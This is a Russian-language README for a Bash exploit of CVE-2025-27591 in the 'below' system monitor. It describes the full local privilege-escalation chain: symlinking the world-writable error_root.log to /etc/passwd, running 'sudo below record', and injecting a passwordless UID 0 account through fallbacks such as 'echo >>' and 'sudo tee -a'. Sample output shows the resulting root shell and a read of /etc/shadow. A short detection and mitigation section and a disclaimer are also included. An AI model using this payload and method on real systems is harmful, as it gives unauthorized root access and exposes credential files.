
Эксплойт повышения привилегий на базе Bash, нацеленный на инструмент системного мониторинга производительности `below`. Этот обновлённый эксплойт использует уязвимость символьной ссылки в механизме ведения журнала, чтобы внедрить root-пользователя в `/etc/passwd`, обеспечивая полный доступ root.
Эксплойт для повышения привилегий на базе Bash, нацеленный на инструмент мониторинга производительности системы below. Этот модернизированный эксплойт использует уязвимость симлинков в механизме логирования для внедрения пользователя с правами root в /etc/passwd, получая полный доступ root.
Обнаружено и сообщено Matthias Gerstner @ SUSE — Security Advisory
/usr/bin/below (монитор производительности системы от Facebook)/var/log/below/error_root.log → /etc/passwdИнструмент мониторинга below записывает ошибки в /var/log/below/error_root.log при работе с повышенными привилегиями. Если каталог логов общедоступен для записи, атакующий может:
error_root.log на /etc/passwdbelow record, чтобы записать сообщения об ошибках в симлинкЭтот эксплойт автоматизирует весь процесс с интеллектуальными механизмами отката для работы с различными конфигурациями системы.
flowchart TD
A[Начало эксплойта] --> B[Получить имя пользователя от пользователя]
B --> C{Проверить /var/log/below<br/>общедоступен для записи?}
C -->|Нет| D[Выход: не уязвим]
C -->|Да| E[Удалить существующий error_root.log]
E --> F[Создать симлинк:<br/>error_root.log → /etc/passwd]
F --> G{Симлинк создан<br/>успешно?}
G -->|Нет| D
G -->|Да| H[Выполнить: sudo below record]
H --> I[Подождать 3 секунды для логирования]
I --> J[Убить процесс below]
J --> K{Полезная нагрузка в<br/>/etc/passwd?}
K -->|Да| M[Путь успеха]
K -->|Нет| L[Попытка ручного внедрения:<br/>echo payload >> symlink]
L --> N{Ручное внедрение<br/>успешно?}
N -->|Нет| O[Попробовать запасной вариант:<br/>sudo tee -a]
N -->|Да| M
O --> P{Запасной вариант<br/>успешен?}
P -->|Нет| D
P -->|Да| M
M --> Q[Проверить полезную нагрузку в /etc/passwd]
Q --> R[Отключить очистку trap]
R --> S[Выполнить: su username]
S --> T[Получена оболочка root]
style A fill:#e1f5ff
style T fill:#90EE90
style D fill:#ffcccb
style M fill:#98fb98Фаза предварительной проверки
/var/log/belowФаза настройки
error_root.log (если есть)/var/log/below/error_root.log → /etc/passwdФаза внедрения (основной метод)
sudo below record в фоне/etc/passwd полезным образомФаза внедрения (запасные методы)
echo >> symlink)sudo tee -a)Фаза запуска оболочки
Внедряемая запись /etc/passwd имеет следующий формат:
username::0:0:username:/root:/bin/bash
Расшифровка полей:
username: Имя пользователя, введённое пользователем (по умолчанию "0xdtc")::: Пустое поле пароля (пароль не требуется)0:0: UID=0, GID=0 (привилегии root)username: Поле GECOS (описание пользователя)/root: Домашний каталог/bin/bash: Оболочка входаbelow/var/log/below должен быть общедоступен для записиsudo для выполнения below record# Сделать скрипт исполняемым
chmod +x CVE-2025-27591
# Запустить эксплойт
./CVE-2025-27591
========================================
CVE-2025-27591 Эксплойт (Bash)
========================================
[*] Этот эксплойт создаст нового пользователя root в /etc/passwd
[?] Введите имя пользователя для нового root-пользователя (по умолчанию: 0xdtc): myuser
[+] Используется имя пользователя: myuser
0xdtc@kali:/tmp$ ./CVE-2025-27591
========================================
CVE-2025-27591 Эксплойт (Bash)
========================================
[*] Этот эксплойт создаст нового пользователя root в /etc/passwd
[?] Введите имя пользователя для нового root-пользователя (по умолчанию: 0xdtc): 0xdtc
[+] Используется имя пользователя: 0xdtc
[*] Проверка на уязвимость CVE-2025-27591
[+] /var/log/below общедоступен для записи
[*] Тестирование создания симлинка
[+] Тест симлинка успешен
[+] Цель уязвима
[*] Начало эксплуатации
[+] Полезная нагрузка записана в /tmp/exploit_payload
[*] Создание симлинка: /var/log/below/error_root.log -> /etc/passwd
[+] Симлинк создан
[*] Выполнение 'sudo below record' для запуска логирования
[*] Запущен 'below record' с PID: 12345
[*] Проверка, была ли записана полезная нагрузка
[*] Попытка ручного внедрения
[*] Добавление полезной нагрузки в /etc/passwd через симлинк
[+] Полезная нагрузка добавлена
[+] Эксплуатация завершена! Полезная нагрузка в /etc/passwd
[*] Запуск оболочки root через 'su 0xdtc'
[*] Пароль должен быть пустым, просто нажмите Enter
root@kali:/tmp# whoami
root
Скрипт включает несколько запасных механизмов для работы с различными конфигурациями системы:
Обработка существующих файлов
Несколько методов внедрения
below recordsudo teeУправление процессами
belowОбнаружение повторного запуска
/etc/passwd.
├── CVE-2025-27591 # Основной скрипт эксплуатации
├── README.md # Эта документация
└── /tmp/exploit_payload # Временный файл полезной нагрузки (создаётся во время выполнения)
После успешной эксплуатации проверьте доступ root:
# Проверить текущего пользователя
root@target:/tmp# whoami
root
# Проверить ID пользователя и группы
root@target:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
# Проверить пользователя в /etc/passwd
root@target:/tmp# grep "^0xdtc:" /etc/passwd
0xdtc::0:0:0xdtc:/root:/bin/bash
# Прочитать файлы, доступные только root
root@target:/tmp# cat /etc/shadow
[... содержимое файла shadow ...]
Если вам нужно удалить вредоносного пользователя после тестирования:
# Удалить внедрённого пользователя из /etc/passwd
sudo sed -i '/^username:/d' /etc/passwd
# Удалить оставшиеся симлинки
rm -f /var/log/below/error_root.log
Замените username на фактическое имя пользователя, которое вы использовали при эксплуатации.
Мониторинг целостности файлов
# Отслеживать несанкционированные изменения в /etc/passwd
aide --check
Обнаружение симлинков
# Проверить подозрительные симлинки в каталогах логов
find /var/log -type l -ls
Журналы аудита
# Проверить подозрительное использование sudo
grep "below record" /var/log/auth.log
Исправить права каталога
# Удалить право на запись для всех из каталога логов
sudo chmod 755 /var/log/below
Политики AppArmor/SELinux
belowОбновить Below
Мониторинг /etc/passwd
Этот эксплойт предназначен только для образовательных целей и авторизованного тестирования на проникновение.
Несанкционированный доступ к компьютерным системам является незаконным. Используйте этот инструмент только на системах, где у вас есть явное разрешение на проведение тестирования безопасности. Автор(ы) не несут ответственности за неправомерное использование этого инструмента.
Используя этот эксплойт, вы подтверждаете, что:
Репозиторий: https://github.com/0xDTC/ Автор: Divine Clown (0xDTC) Лицензия: Только для образовательного использования Последнее обновление: 2025-11-13
/etc/passwdsu <username> для получения оболочки root